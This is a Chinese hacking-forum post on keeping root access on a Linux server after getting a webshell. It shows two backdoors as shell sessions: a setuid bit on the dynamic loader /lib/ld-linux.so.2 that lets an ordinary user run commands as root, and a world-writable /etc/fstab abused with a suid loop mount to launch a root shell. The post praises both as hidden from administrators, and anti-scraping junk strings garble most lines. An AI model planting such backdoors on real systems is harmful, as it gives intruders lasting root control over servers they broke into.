中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]
作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
: j* z# l1 B% X' ?% ^2 v* s/ ^% b: a' U# T: ?
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究6 n# o. i+ ?: [) H* n, ^- p. B
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究) B: v1 c" b( f% w
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
3 R: o, i6 w" R. E0 h. O6 T% h+ A[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究9 y6 j" R$ L, l4 r
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究& a. @) V, F1 w2 g8 V
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
. t" ?4 C! M/ g* ?4 c% Vlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
& T- L8 Z0 l4 M' o0 u4 C' Q' m& K[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究' P3 W5 B+ @7 }. Y+ h9 s" X: Z- p
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究7 T: l9 V& u! O# t% Z; _

' ^0 s9 N/ ^4 y* x普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究- `8 l0 {. V9 k* s. n6 k& ^3 K
# `/ B1 \+ Y; v* {
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究) r+ D4 X+ W* x: r! x7 U1 d" `
xiaoyu2ezX-BUG-关注前沿信息安全技术研究) V  T0 H- c) x* G: e3 Q4 D7 T
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究, ?1 G* Y' Z' ]- z: S6 E9 r
root2ezX-BUG-关注前沿信息安全技术研究2 y# [5 U" q5 B$ c  n
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究* d4 d: x6 h, l7 z* Z' n2 ?
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究$ T, t4 D3 w/ n1 `
: x% k$ ~9 P1 d9 k+ L
方法二:2ezX-BUG-关注前沿信息安全技术研究7 y; ?3 a/ ^+ h* A% _- U

9 i# K# U5 ~" o$ o3 p看过程:2ezX-BUG-关注前沿信息安全技术研究% Z. Z# d% M- K. V! ~/ E( p$ g

( W: D! d8 {7 j1 s" F[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究( H( H/ R( z+ q  h& ^
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究
2 L0 H# s+ H0 z0 A/ I
8 i3 V8 s+ v2 _0 Y+ g$ q" _这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
5 f4 O$ @+ w3 g1 H. B7 }, ~8 `: q! J! H! L) `/ Q3 v4 |4 |
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究3 Q8 q6 m# V% x! p  x
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
8 V; o7 O1 K" H# h4 h; ~[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究% `' U4 N$ {; E8 ]

" Q( [7 Y+ b& Z: `然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
' G+ N% A4 ^. d7 x9 R. E
; j" r( N* P0 Y& R" Z6 v1 t. \[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
% b9 P/ C) ?0 {+ j& n! ?6 v, v-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究- ]( _! y6 }- X! w
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究$ ?- }$ }0 C/ m2 A8 \; @
[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究
$ q$ \% U: p) f6 h0 T( o% p[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究6 A4 g/ w8 C' k. V3 f- S3 M
total 182ezX-BUG-关注前沿信息安全技术研究/ ]) q1 t  _  y5 ?/ {9 Q
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究2 |7 @3 Y' Q, O( K/ D0 b( D
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究1 k! ]# y0 Y, y
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究3 y& {: M8 c" z
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
1 F+ G0 U! E2 N7 [6 a6 A- w1 _2 m+ e6 I* z看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究7 Z8 b) _9 ~7 F# l# \, d
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
# N3 L* u2 }2 s+ f8 u7 Q. E
" H* U* a- ^( ^3 D) }* f貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究3 |" E5 H9 S4 H2 \7 l
2ezX-BUG-关注前沿信息安全技术研究8 M, w& U2 c+ K
3 i+ b6 u8 {2 g3 Q: M6 x
作者: wuyu    时间: 2013-3-13 15:10
谢谢分享



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2